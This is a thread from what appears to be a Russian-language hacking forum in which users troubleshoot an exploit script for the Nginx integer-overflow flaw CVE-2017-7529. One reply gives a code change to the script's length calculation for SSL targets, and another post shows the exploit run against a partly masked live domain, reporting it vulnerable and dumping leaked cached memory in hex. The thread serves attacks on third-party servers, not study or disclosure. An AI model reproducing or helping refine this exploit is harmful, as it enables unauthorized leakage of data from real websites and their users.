Can anyone help with an exploit for this?
https://gist.github.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966
Thanks
https://gist.github.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966
Thanks
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Help with Exploit for CVE-2017-7529 Nginx integer overflow
- Автор темы X-Particle
- Дата начала
Don't see any problem with syntax. What kind of errors are you getting?
If you have ssl targeting - change line 19 to the following:
If you have ssl targeting - change line 19 to the following:
NGINX:
length = int(requests.get(url, verify=False).headers.get("Content-Length", 0)) + 623- Автор темы
- Добавить закладку
- #3
Код:
+] www.nxxxxx.com is Vulnerable: TRUE
[i] Receiving Data [3453 bytes] ...
- 0000: 2d 2d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 --00000000000000
- 0010: 30 30 30 30 32 35 43 6f 6e 74 65 6e 74 2d 54 79 000025Content-Ty
- 0020: 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 pe: text/html; c
- 0030: 68 61 72 73 65 74 3d 75 74 66 2d 38 43 6f 6e 74 harset=utf-8Cont
- 0040: 65 6e 74 2d 52 61 6e 67 65 3a 20 62 79 74 65 73 ent-Range: bytes
- 0050: 20 36 31 35 35 2d 36 37 37 37 2f 36 37 37 38 3e 6155-6777/6778>
- 0060: 27 20 2b 20 73 69 74 65 73 5b 69 5d 2e 61 72 74 ' + sites[i].art
- 0070: 54 69 74 6c 65 20 2b 20 27 3c 2f 73 70 61 6e 3e Title + '</span>
- 0080: 3c 2f 6c 69 3e 27 2b 0a 09 09 09 09 09 09 09 27 </li>'+........'
- 0090: 09 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 .........<li cla
- 00a0: 73 73 3d 22 66 6c 20 6e 6f 74 69 63 54 69 6d 65 ss="fl noticTime
- 00b0: 22 3e 27 20 2b 20 73 69 74 65 73 5b 69 5d 2e 61 ">' + sites[i].a
- 00c0: 72 74 41 64 64 74 69 6d 65 20 2b 20 27 3c 2f 6c rtAddtime + '</l
- 00d0: 69 3e 27 2b 0a 09 09 09 09 09 09 09 27 09 09 09 i>'+........'...
- 00e0: 09 09 09 09 09 3c 2f 75 6c 3e 27 2b 0a 09 09 09 .....</ul>'+....
- 00f0: 09 09 09 09 27 09 09 09 09 09 09 09 3c 2f 61 3e ....'.......</a>
- 0100: 27 3b 0a 09 09 09 09 09 09 09 09 09 09 09 7d 0a ';............}.
- 0110: 09 09 09 09 09 09 09 09 09 09 09 24 28 22 23 6e ...........$("#n
- 0120: 6f 74 69 63 65 4c 69 73 74 22 29 2e 68 74 6d 6c oticeList").html
- 0130: 28 68 74 6d 6c 29 3b 09 0a 09 09 09 09 09 09 09 (html);.........
- 0140: 09 09 09 09 76 61 72 20 24 6e 6f 74 69 63 65 4c ....var $noticeL
- 0150: 69 73 74 20 3d 20 24 28 22 2e 6e 6f 74 69 63 65 ist = $(".notice
- 0160: 4c 69 73 74 20 6c 69 22 29 0a 09 09 09 09 09 09 List li").......
- 0170: 09 09 09 09 09 24 6e 6f 74 69 63 65 4c 69 73 74 .....$noticeList
- 0180: 2e 68 6f 76 65 72 28 66 75 6e 63 74 69 6f 6e 28 .hover(function(
- 0190: 29 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 76 ){.............v
- 01a0: 61 72 20 5f 74 68 69 73 20 3d 20 24 28 74 68 69 ar _this = $(thi
- 01b0: 73 29 3b 0a 09 09 09 09 09 09 09 09 09 09 09 09 s);.............
- 01c0: 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 5f 74 .............._t
- 01d0: 68 69 73 2e 61 64 64 43 6c 61 73 73 28 22 61 63 his.addClass("ac
- 01e0: 74 69 76 65 22 29 0a 09 09 09 09 09 09 09 09 09 tive")..........
- 01f0: 09 09 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a ..},function(){.
- 0200: 09 09 09 09 09 09 09 09 09 09 09 09 76 61 72 20 ............var
- 0210: 5f 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b _this = $(this);
- 0220: 0a 09 09 09 09 09 09 09 09 09 09 09 09 5f 74 68 ............._th
- 0230: 69 73 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 is.removeClass("
- 0240: 61 63 74 69 76 65 22 29 0a 09 09 09 09 09 09 09 active")........
- 0250: 09 09 09 09 7d 29 0a 09 09 09 09 09 09 09 09 09 ....})..........
- 0260: 09 7d 0a 09 09 09 09 09 09 09 09 09 7d 0a 09 09 .}..........}...
- 0270: 09 09 09 09 09 09 7d 29 0a 09 09 09 09 09 09 09 ......})........
- 0280: 7d 0a 09 09 09 09 09 09 7d 29 3b 09 0a 0a 09 09 }.......});.....
- 0290: 09 09 09 7d 0a 09 09 09 09 7d 0a 09 09 09 7d 29 ...}.....}....})
- 02a0: 0a 09 09 7d 29 0a 0a 20 20 20 20 09 09 0a 0a 0a ...}).. .....
- 02b0: 09 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 2f ..</script>...</
- 02c0: 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 43 6f body>.</html>.Co
- 02d0: 6e 74 65 6e 74 2d 52 61 6e 67 65 3a 20 62 79 74 ntent-Range: byt
- 02e0: 65 73 20 2d 39 32 32 33 33 37 32 30 33 36 38 35 es -922337203685
- 02f0: 34 37 36 38 35 39 39 2d 36 37 37 37 2f 36 37 37 4768599-6777/677
- 0300: 38 2d 2d 30 30 30 30 30 30 30 30 30 30 30 30 30 8--0000000000000
- 0310: 30 30 30 30 30 32 36 2d 2d 30 30 30 30 30 30 30 0000026--0000000
- 0320: 30 30 30 30 30 30 30 30 30 30 30 32 37 2d 2d 30 0000000000027--0
- 0330: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000